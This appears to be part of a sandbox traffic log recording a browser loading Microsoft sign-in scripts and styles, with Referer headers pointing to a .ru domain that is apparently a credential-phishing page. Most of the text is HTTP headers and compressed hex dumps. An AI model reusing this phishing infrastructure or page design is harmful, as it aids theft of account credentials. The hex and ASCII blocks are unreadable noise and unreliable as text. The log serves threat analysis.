                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:57 UTC775INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:57 GMT
                                                                                                                          Content-Type: text/css
                                                                                                                          Content-Length: 20268
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Thu, 28 Dec 2023 06:13:57 GMT
                                                                                                                          ETag: 0x8DC076C2D17A220
                                                                                                                          x-ms-request-id: 3615f972-e01e-0049-393e-539771000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191757Z-smhrpgcv2d1n71w9agnr5te8an00000005x000000000fpup
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:17:57 UTC15609INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 6d 93 1b b7 b1 28 fc 5d bf 62 ce ba 5c d1 fa 90 13 72 f8 ba 64 45 15 59 56 ec 3d 47 6f 25 c9 c9 49 b9 54 a9 59 72 b8 9c a3 21 87 77 66 b8 ab 0d ef fe f7 07 ef 68 00 0d 70 b8 5a c7 b9 4f 39 8a 25 0e ba d1 00 ba 1b 0d 34 80 06 fe f8 dd 7f 44 2f ca dd 5d 95 5f af 9b e8 e9 8b f3 e8 75 be a8 ca ba 5c 35 24 bd da 95 55 da e4 e5 36 8e 9e 17 45 c4 90 ea a8 ca ea ac ba c9 96 71 f4 dd 1f 9f fc f1 bb ff 78 d2 6d ff bf e8 c3 c7 e7 ef 3f 46 6f ff 12 7d fc e9 f2 fd 0f d1 3b f2 f5 f7 e8 cd db 8f 97 2f 5e 46 ad a9 3c 79 f2 71 9d d7 d1 2a 2f b2 88 fc 7b 95 d6 d9 32 2a b7 51 59 45 f9 76 21 aa 9d d5 d1 86 fc 5d e5 69 11 ad aa 72 13 35 eb 2c da 55 e5 ff 66 0b d2 88 22 af 1b 92 e9 2a 2b ca db e8 29 21 57 2d a3 77 69 d5 dc 45 97 ef ce e3 e8
                                                                                                                          Data Ascii: m(]b\rdEYV=Go%ITYr!wfhpZO9%4D/]_u\5$U6Eqxm?Fo};/^F<yq*/{2*QYEv!]ir5,Uf"*+)!W-wiE
                                                                                                                          2024-02-02 19:17:57 UTC4659INData Raw: 89 b4 63 06 c7 cd e4 db bc d2 01 17 7d 59 27 c0 20 15 98 62 ad 42 c2 45 09 b9 0f 0b df 51 57 37 c3 ea 01 d7 4c 0f 77 63 2d ea 2e df cb 43 04 3e 73 21 5c ec 1e 00 67 5f 00 28 55 00 41 11 8a 80 40 84 3a 20 10 a9 14 08 48 ab 06 02 94 0a 82 80 98 9a a0 e9 54 59 30 80 af cd 4c 71 90 74 ae 3e 02 20 95 48 7c 72 55 12 0e 87 a9 2e 83 84 fe f1 6b cc f4 dc 90 29 12 f1 2d 64 ea 42 84 4c 71 80 68 9f 1f a8 64 ea a2 48 99 ba 10 29 53 17 a2 64 ea 82 80 4c 5d a0 92 a9 0b e2 32 c5 d2 99 4c 11 80 af cd 5c a6 6e ba 90 29 07 28 99 f2 4f 21 53 7e a0 c2 94 a9 2f 80 c8 db 51 65 40 a7 5f bc 3a e8 d3 2b e8 a3 28 bc f9 ad d0 a4 f0 83 c8 42 0d 82 38 42 21 82 38 52 35 82 48 5a 49 82 68 52 5d 82 48 4c 71 8e 60 50 15 0a a3 1c e7 26 53 ab 20 06 57 30 07 45 aa 9a 03 e0 4a 67 27 e3 71 c0
                                                                                                                          Data Ascii: c}Y' bBEQW7Lwc-.C>s!\g_(UA@: HTY0Lqt> H|rU.k)-dBLqhdH)SdL]2L\n)(O!S~/Qe@_:+(B8B!8R5HZIhR]HLq`P&S W0EJg'q


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          65192.168.2.164979713.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:57 UTC628OUTGET /16.000/content/js/ConvergedLoginPaginatedStrings.en_hvJVkkYnJRncZtU7cDywlg2.js HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://ywnjb.q2zg22.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:58 UTC790INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:58 GMT
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Content-Length: 9793
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Thu, 04 Jan 2024 06:28:13 GMT
                                                                                                                          ETag: 0x8DC0CEE54494C59
                                                                                                                          x-ms-request-id: d7afe9d6-201e-002d-7b3e-53795b000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191758Z-yktz0xxup122x2g6z9ru6nyw6s00000005d000000000btnw
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:17:58 UTC9793INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d db 72 23 b9 72 e0 bb bf a2 9a 27 62 24 fa 70 78 5a 9a 3e 67 23 d8 cd 96 75 9d e6 8e 6e 21 aa 5b ee 98 e9 60 80 2c 90 2a ab 58 a8 ad 2a 4a c3 a3 96 c3 ef 7e f5 07 ec b7 ec a7 f8 4b 36 2f 00 0a 75 23 29 4d 8f 8f 77 ed 88 89 1e 8a 04 12 09 20 33 91 37 24 5e 4d 17 d1 24 0b 54 b4 2d db 8f e6 b3 a7 b6 83 f6 63 30 dd 8e 7e 0e be b4 13 99 2d 92 c8 c3 cf 5d f9 6b ac 92 2c 7d 7b 2f 12 2f eb e3 57 fd 47 fd 5d ef f1 a9 13 f8 bd a0 13 2a e1 4b bf f7 6a e7 e9 ad ee 2a b1 eb 44 84 e1 76 66 20 74 b2 4e fe 59 b5 e1 0f ee d6 7f f5 3a ff e1 09 87 89 fa 8f 16 90 ea ce fb b2 a3 ba 93 7e 04 ff c6 fd 56 ab a3 b6 5f b7 9f b6 7f ce a7 d1 51 9d a8 fd 88 3d 83 7e b4 bd 03 a0 e1 7f 7f 6e 77 12 f8 df 9b 76 47 f4 b3 ee 30 4b 82 68 96 7e 12 49 20 a2
                                                                                                                          Data Ascii: }r#r'b$pxZ>g#un![`,*X*J~K6/u#)Mw 37$^M$T-c0~-]k,}{//WG]*Kj*Dvf tNY:~V_Q=~nwvG0Kh~I


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          66192.168.2.164980013.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:58 UTC619OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_yZQmhMbiqPW1IsJcdAPQ0A2.js HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Origin: https://ywnjb.q2zg22.ru
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:58 UTC792INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:58 GMT
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Content-Length: 117041
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Thu, 04 Jan 2024 22:35:26 GMT
                                                                                                                          ETag: 0x8DC0D7572A779F2
                                                                                                                          x-ms-request-id: 62f4d51c-c01e-0023-5d3f-55db46000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191758Z-bhu4n2hwzh2xzfpvezs73vt9g800000004u000000000d5rf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:17:58 UTC15592INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 7d 5b eb 38 92 38 fa ff fd 14 c1 33 97 49 06 93 93 f7 17 d3 6e 36 04 38 87 69 20 0c 81 ee de e5 30 3c 8e ad 04 37 8e 9d b5 1d 5e 26 64 3f fb af aa 24 d9 b2 e3 70 ce 99 dd bb f7 b9 cf 3d d3 13 6c a9 24 95 4a a5 52 55 59 2a 7d fa eb ce ff 55 fa 6b 69 ff fb ff 95 c6 37 83 eb 9b d2 e8 b4 74 f3 e5 ec fa b8 74 05 6f ff 5e ba 1c dd 9c 0d 4f be bf 1e 6c 14 ff 7f f3 e8 46 a5 a9 eb b1 12 fc 9d 58 11 73 4a 81 5f 0a c2 92 eb db 41 b8 08 42 2b 66 51 69 0e bf a1 6b 79 a5 69 18 cc 4b f1 23 2b 2d c2 e0 0f 66 c7 51 c9 73 a3 18 0a 4d 98 17 bc 94 ca 50 5d e8 94 ae ac 30 7e 2b 9d 5d 55 aa 50 3f 83 da dc 99 eb 43 69 3b 58 bc c1 f3 63 5c f2 83 d8 b5 59 c9 f2 1d aa cd 83 17 3f 62 a5 a5 ef b0 b0 f4 f2 e8 da 8f a5 0b d7 0e 83 28 98 c6 a5 90 d9
                                                                                                                          Data Ascii: }[883In68i 0<7^&d?$p=l$JRUY*}Uki7tto^OlFXsJ_AB+fQikyiK#+-fQsMP]0~+]UP?Ci;Xc\Y?b(
                                                                                                                          2024-02-02 19:17:58 UTC16384INData Raw: 4a 51 cc 6a c8 42 3c 2e c6 30 8a 28 b9 99 24 67 a2 59 51 1e 6f 87 84 8e 98 7a 7c 77 24 e6 b5 65 b9 b3 17 6b 1c 05 29 0a 1d ca 18 c5 76 36 c8 22 e5 75 29 af 28 06 23 65 f7 28 9b 42 cc 14 97 ef 73 84 78 30 8c 0c 4d 30 44 5d 5a 7a e3 a6 48 8c 43 48 d9 27 be 53 94 c9 89 03 a6 09 7e 18 c0 84 84 2c 9b b7 74 4a f2 d0 1d c3 3c 50 c7 83 1c 57 9c 1e 49 e2 c5 78 80 02 50 44 0d 69 d1 f0 24 99 83 c1 71 2e b3 91 66 8e 9f dc c5 7f b0 30 a0 03 ce 94 d9 4c 33 33 b3 39 29 9d 6d 97 c2 27 0a cc 13 90 76 0a 42 f1 c5 94 3b 75 91 c0 2d 1a 3c 48 09 5d c2 21 b9 8b 9d 72 28 14 0b df 16 0a 1a a5 97 04 0c 19 86 2e 85 5f a1 28 1a d3 80 e2 c0 b8 49 9c 07 7d f8 fb 17 a3 a7 1f b3 c9 72 26 42 86 4d 82 88 62 eb c0 0a 60 74 da ed 26 85 07 f9 e2 62 70 90 0b 8a 29 21 2a 86 24 8c 65 72 01 06
                                                                                                                          Data Ascii: JQjB<.0($gYQoz|w$ek)v6"u)(#e(Bsx0M0D]ZzHCH'S~,tJ<PWIxPDi$q.f0L339)m'vB;u-<H]!r(._(I}r&BMb`t&bp)!*$er
                                                                                                                          2024-02-02 19:17:58 UTC16384INData Raw: 1d 8e 4f 77 4a 00 17 02 db a2 84 1b 91 fb 07 05 fc ad 78 b1 a7 bd 89 b8 38 d8 53 3e 35 90 7d 9b 3f f6 a9 e8 ab 87 f3 cf 7c a7 ee 49 70 24 a9 5c 64 24 7f ec da 63 df bc 23 f9 00 a2 aa c5 dd b1 e3 b4 b5 68 6a 34 d0 e9 e0 13 8b de 61 89 67 91 56 b2 08 64 aa de ff 4f 30 29 35 03 57 a9 da fc 06 f3 71 91 98 8d 32 9d 90 32 21 a3 ec 7c ec ed 48 56 65 21 a6 e8 f7 7b 55 b8 6d 54 79 f2 82 3a 45 1d 40 88 c9 b1 c4 8b da 5d 52 6a ca fb 50 49 4f 7b c6 35 91 22 87 6b ab 10 07 ff 96 18 33 fc f9 0b 06 da f8 4b 4b 53 e5 ce 89 5c 3a fb 9a 22 c7 e2 9b 4f aa 14 c5 bf a2 ba 8e 87 c3 51 9c 44 02 27 f4 73 9c 21 b2 3b 6b 30 4d 6a e3 5f b0 50 c5 fc de dd 73 38 c4 1a a6 d0 58 cf 55 89 f7 3b 78 c6 7e c1 33 a2 08 85 e7 e7 45 75 b6 f5 83 0e d6 f7 bc 34 1d 3c e4 cf 50 4f 5e 56 20 99 9c
                                                                                                                          Data Ascii: OwJx8S>5}?|Ip$\d$c#hj4agVdO0)5Wq22!|HVe!{UmTy:E@]RjPIO{5"k3KKS\:"OQD's!;k0Mj_Ps8XU;x~3Eu4<PO^V
                                                                                                                          2024-02-02 19:17:58 UTC16384INData Raw: da c3 27 06 a9 da 4f 40 c2 8d c3 86 38 15 f3 ab 20 6f 60 8e f8 ac 31 8a af a3 06 5a 19 94 63 58 a7 01 22 12 e6 02 b8 67 c7 e0 00 06 e3 0a 84 66 85 26 25 43 e5 ad 22 f9 49 84 54 fd 9f 41 cd f1 51 df 77 1b 3b ef 73 c7 67 33 f1 43 f5 1d 4d f2 47 03 69 98 49 0d 97 b5 3c 50 07 85 e9 cb 76 ac ee 7f 41 45 09 de 36 0b fc 33 30 4a 3c 52 a0 68 11 fa 63 f1 12 3f 80 c9 b4 d0 a1 10 7e 7b b7 ea 0e 29 0e 30 49 0c 6a 13 51 8e bc 87 fd 66 3e fd 12 8f 46 fc 18 9f de d3 d3 0f 41 79 9a a5 b7 b3 b4 06 d9 14 2b 0b c4 1d 78 20 db 62 02 60 51 60 7e 55 c5 21 37 3c 59 89 a2 90 a3 d2 44 ea 8b f8 4f 72 07 d7 27 b8 41 1e a1 85 2b 48 c2 37 5c 8c f9 23 51 1a 2f 94 80 ef 15 6a d3 88 16 a9 1d a9 ed 1f d1 a7 10 75 88 24 c1 78 40 60 bd 6b 72 a1 13 6a 1e 01 2e 2d 8a fa 0f ac 74 5c 10 49 41
                                                                                                                          Data Ascii: 'O@8 o`1ZcX"gf&%C"ITAQw;sg3CMGiI<PvAE630J<Rhc?~{)0IjQf>FAy+x b`Q`~U!7<YDOr'A+H7\#Q/ju$x@`krj.-t\IA
                                                                                                                          2024-02-02 19:17:58 UTC16384INData Raw: 6a 15 57 81 c0 8f db f9 e1 4a ad 8d b5 b5 9d e0 0a be 14 97 6d d5 9f 29 a5 a8 9a 74 7d 03 31 70 0e 5b 67 1d 2c 98 ed fc 1a 67 5d 29 eb 76 8b fc 9a 8e be b7 b0 c8 65 ee 18 24 f9 f4 5a 6c bb 6a 75 3a eb 10 f2 08 41 db 34 cd 66 a3 b8 71 bf 61 33 1b b6 9e 2f 77 4c 6b 38 30 01 6b 20 91 5e 1f 1e 56 a5 31 94 c5 03 79 01 2b 92 cc bd 8c 4f 3e cd 33 5a f2 3e 48 d4 26 5a 79 88 38 fb d2 66 49 df 8f 89 0c 10 cb 50 7e d5 5b 95 55 8c ba 7b 31 f2 e5 5d 39 b6 59 8c 53 da 96 0c 86 71 c3 5e ff 2c ee b0 d4 be 19 37 4c 84 a4 73 9c f6 2a a8 52 a9 8f d6 39 ae 6b 02 82 7e c4 4f 10 21 98 7f e4 20 f6 19 40 89 35 ae e3 f9 b9 a7 f5 4f 5f ca 4d 0c 94 5f 31 6a 1b 08 47 d9 e9 e5 e5 c6 18 a6 73 6f 04 27 2a 73 69 5f fe 98 b4 32 5f 17 2b 32 14 0a 2d 13 9c c3 8a fa 89 d0 fd 55 9e af e4 d3
                                                                                                                          Data Ascii: jWJm)t}1p[g,g])ve$Zlju:A4fqa3/wLk80k ^V1y+O>3Z>H&Zy8fIP~[U{1]9YSq^,7Ls*R9k~O! @5O_M_1jGso'*si_2_+2-U
                                                                                                                          2024-02-02 19:17:58 UTC16384INData Raw: 30 f0 02 9b 18 d8 8a 02 27 e4 07 91 e4 66 27 cb 3c f4 e1 36 5b 14 c8 49 23 48 07 37 80 ca 70 29 79 14 be 8e 17 84 87 41 a0 0d c5 9e 4a 37 e5 dc 85 69 17 d8 22 81 7d 8e 61 b1 20 02 89 38 9c 1f c4 a8 0c 56 ab 69 01 5c ea 00 46 bf 88 c0 40 f0 ac 3d f2 d5 22 5a 2d 64 91 3c 4c 68 34 70 e6 61 18 f8 31 f3 3d 87 03 79 a1 c5 a1 e7 29 dc e2 91 ed ec 5b 87 b1 60 cd 4e a1 79 28 44 94 c4 cc 81 1b 48 29 74 2c 89 03 b8 b7 ae 25 3d 2f 80 1f 70 10 b5 11 b8 73 2b f1 42 09 7e 72 1c 52 1b 82 c1 ec f7 04 f0 e7 c5 e0 26 69 1d c4 00 0b d6 96 91 15 45 be 23 43 b8 b8 31 46 12 88 84 f2 58 38 05 0a 20 69 0f e2 50 07 de 9c fb 89 65 79 7e 1a fb 31 3c 69 5b 88 d0 b3 62 26 13 2f f0 3c 2b 3d 4c 16 6c b0 8a 19 25 10 47 64 aa b8 f0 04 2c e9 92 a7 eb c3 f8 73 42 cb 4b ac c3 78 1a 01 2c a3
                                                                                                                          Data Ascii: 0'f'<6[I#H7p)yAJ7i"}a 8Vi\F@="Z-d<Lh4pa1=y)[`Ny(DH)t,%=/ps+B~rR&iE#C1FX8 iPey~1<i[b&/<+=Ll%Gd,sBKx,
                                                                                                                          2024-02-02 19:17:58 UTC16384INData Raw: 21 f7 78 b0 31 35 7d 66 57 d3 c4 05 bc ab 85 ec 78 10 db 85 32 d2 91 83 f7 94 60 b5 f8 80 4e 37 63 bf 3b aa 35 8c 6a 2c 1d fd b4 03 ee 0e 85 dd 84 89 60 eb 41 23 1f 2d 48 25 2f a4 48 3e bc 86 62 a5 da 53 f3 e8 db 0f 3b 8f 04 a3 aa 74 ea 55 99 25 54 ae a9 28 d6 4f 86 5b 0b 51 e6 77 b3 1e e8 30 99 d1 02 f4 ef cd 2a a0 b7 a7 36 d2 c0 92 99 f2 1b 13 c5 29 55 1f 92 fb ea 95 c5 fb 9b 8a ae 8a 7f ca 7d 4d 8b 82 4e b7 68 7a 3f 4a 33 b9 10 3b 0f 07 69 ff 3e e3 a0 90 f6 ef f3 0f 0d e9 74 d2 96 22 cf d4 41 22 9a 9e 94 e4 d0 8f 3f 0b da ad c6 f4 3a 27 59 86 af 8d 69 a8 b7 7d cd 3b 4d ef 32 09 37 7f 29 a4 55 f5 63 fe a2 dd c5 8d cb a8 37 02 f7 a2 54 da e0 25 4b 12 75 76 aa 22 e2 1b 4a 90 75 f4 71 a0 9d 74 75 ce c2 eb 7b 49 51 9f bf ee 3f 1d a1 ef a7 f5 c0 b7 05 da be
                                                                                                                          Data Ascii: !x15}fWx2`N7c;5j,`A#-H%/H>bS;tU%T(O[Qw0*6)U}MNhz?J3;i>t"A"?:'Yi};M27)Uc7T%Kuv"Juqtu{IQ?
                                                                                                                          2024-02-02 19:17:58 UTC3145INData Raw: 7a 82 98 dd c3 e0 bd a2 b6 58 a2 70 2e 78 43 7a 8c 9d 9f bf 2f 74 9e 2f a6 73 9a 88 36 2f 22 fa 27 a3 a5 79 f2 ec b3 0f f2 69 43 2a 75 1c 2c 45 a3 12 94 2f f6 7b df f6 06 f4 e0 3b 3e 82 f1 c2 df b3 d5 72 82 9b 7d 39 c5 64 f5 3d ac 70 b1 bf 4d 98 c6 35 75 af e7 41 a2 aa 0b c3 57 75 92 79 e1 d3 62 19 1d a9 c6 f0 99 2f d6 2b 1e 6d 8b 79 1d 50 44 e1 5c 56 7c bd 62 87 dc 54 d5 34 bb df bb f6 3f 33 dc 1c f7 35 cd e8 97 28 0a df cd a5 b9 f1 d3 78 49 7e 5f e3 e5 d2 71 1f 8f 3a 49 30 20 8a b3 4b 82 e2 ca 01 9d f4 98 aa d3 81 3c 33 a8 53 77 f0 09 75 40 ef 97 0a af 96 d3 cb 4b b2 04 54 47 5a 59 7e 47 f7 f7 b8 5f 6b 61 f2 0c 06 7a d3 34 8a b6 94 56 59 4c 9f 99 3f bf 64 08 79 7c 0c 0b 8a ba 3e ba 86 64 5e db 43 b5 26 d6 ab 04 b7 25 7a 4b 72 9c 3e 4d d9 32 45 47 c2 3b
                                                                                                                          Data Ascii: zXp.xCz/t/s6/"'yiC*u,E/{;>r}9d=pM5uAWuyb/+myPD\V|bT4?35(xI~_q:I0 K<3Swu@KTGZY~G_kaz4VYL?dy|>d^C&%zKr>M2EG;


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          67192.168.2.164980113.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:59 UTC571OUTGET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-02-02 19:17:59 UTC791INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:59 GMT
                                                                                                                          Content-Type: application/x-javascript
                                                                                                                          Content-Length: 61052
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Last-Modified: Thu, 25 May 2023 17:33:39 GMT
                                                                                                                          ETag: 0x8DB5D462D49A834
                                                                                                                          x-ms-request-id: 6409432a-101e-0072-5f48-529377000000
                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          x-azure-ref: 20240202T191759Z-auqs5wtcq16excxt6u225qg6y000000004z00000000056g6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-02-02 19:17:59 UTC15593INData Raw: 1f 8b 08 00 00 00 00 00 04 00 cc bd 69 77 db 46 b2 30 fc fd fe 0a 0a 27 57 03 8c da 34 29 2f 71 48 23 bc b2 44 db 4c b4 45 4b 9c 8c ac d1 81 c8 96 04 9b 04 18 00 94 ac 91 f8 df 9f aa ea 1d 04 28 29 c9 7d ef 7b 12 8b 40 a3 7a af ae ae ae ae c5 bf 89 93 51 7a d3 2c f8 98 4f 78 91 dd 9e dd f0 f3 69 34 fc fa 53 9e 26 d3 70 e9 d7 fb fb 93 d3 a0 39 9d e5 57 fe c9 c9 fa 29 3b 61 8c 5d cc 92 61 11 a7 89 cf 59 c1 92 e0 ce 9b e5 bc 91 17 59 3c 2c bc 6e d2 cc fc 22 60 49 73 e4 17 cc fb 35 1a cf f8 cf 50 81 c7 7c 9d 2d b8 cb 78 31 cb 92 46 d6 e4 f3 40 c3 f6 af 79 52 6c 47 05 4f 86 b7 35 e0 51 19 7c 9f 67 79 9c 63 16 5e 93 e5 dc ca 72 94 45 43 be cd af f9 b8 06 78 64 01 6f 4c a7 83 24 8f 2f af 8a 7c 33 cd aa 8b 8f 9d 16 bd 8b 72 5e 0b 6a 17 7d d6 ff 06 4d 1e f1 d1 20
                                                                                                                          Data Ascii: iwF0'W4)/qH#DLEK()}{@zQz,Oxi4S&p9W);a]aYY<,n"`Is5P|-x1F@yRlGO5Q|gyc^rECxdoL$/|3r^j}M
                                                                                                                          2024-02-02 19:17:59 UTC16384INData Raw: 45 5f ae b8 15 0a 6b 9f 0b 6f 06 46 14 14 a0 01 d4 75 81 77 09 f9 14 b6 80 d5 55 f7 1d da c5 86 b6 4e 3c e4 1f ba 37 9b b7 b5 c3 23 d4 c8 84 ec 45 b0 c9 37 15 f4 52 19 68 52 db 84 ba 3a 93 b3 c0 d0 32 cd 34 96 c5 e1 77 a8 86 82 5b a0 e4 0c 44 e8 9f fe b7 62 f3 e2 12 ef cd f4 45 86 1d 76 a9 ca dd 36 79 da 4e 84 b4 06 0b 02 f6 93 7c 32 6b 9e 1f 01 48 1d b9 b0 1d 0e 45 73 ff 0a 48 49 e1 df 50 90 3f 40 e9 4f 5c e1 0c 8a 9e 20 e1 3d f7 f7 d8 4d ad e8 59 f6 8d fc 90 12 fc 6f ee 36 ee 97 d9 84 b2 55 80 c3 3d dc ed cb 9b 20 58 b6 fb e2 12 a8 93 cc bb ce 09 d9 17 b7 1b 9e c3 3b 01 49 81 06 e2 8a cd c8 00 2b 23 63 ac 8c 91 a8 99 6f 92 81 56 7b 8e f7 8d b2 42 9c 4a 97 0c 0b bf 45 f5 d2 62 f4 5e b0 ec 3b b3 a4 63 b8 24 72 e0 05 15 1f 7d e2 3d 3f 37 19 0f e3 4b d8 f3
                                                                                                                          Data Ascii: E_koFuwUN<7#E7RhR:24w[DbEv6yN|2kHEsHIP?@O\ =MYo6U= X;I+#coV{BJEb^;c$r}=?7K
                                                                                                                          2024-02-02 19:17:59 UTC16384INData Raw: 6d 6f 68 90 c6 f2 9e eb 33 2a c7 18 89 31 56 eb 59 ec bb 71 89 7f aa 93 e3 73 84 51 29 6d 4a 14 bb 22 63 6f 55 2c 47 e7 05 5d 5b 13 bf a6 ac 26 93 2d 98 72 a5 b7 e5 5a dc 5a c8 41 d4 fd e4 3e 1d 71 da 8f 3c 15 aa a8 02 27 5f eb 0a 69 e7 9e 8a 73 ab 65 64 09 18 b0 07 f0 47 1a e5 af 1f a1 b3 aa 6f 4a be 45 d8 0b 7b 11 7c 72 79 14 0f bd 57 cd 6e 76 d1 ec b5 e1 b3 8d 9d 95 66 c2 ca 10 cd 0f a3 7c 90 c5 ac c9 5a ae fa 7f c2 e6 88 97 22 c9 e1 52 b2 22 5d 8a f0 0f 96 12 40 d3 a5 e8 7c be 94 98 1b 2d 25 d5 4c 26 46 3d 61 3a 5c 4a 00 f5 97 a2 e2 77 4b d1 f9 c9 52 72 ef 6a 29 b9 77 6c 21 fc db 40 f8 5d c6 fc 1b 37 be c9 6d fc 7a 4e 9b e8 e0 a1 68 5f 34 7d d6 b3 76 7a fe 9b e8 2e 1e 44 9c d8 a2 fa f9 8d 92 11 d2 4d a4 6e 0a 47 ef 48 fc 1c f5 39 69 8b 0e 7f d4 a7 84
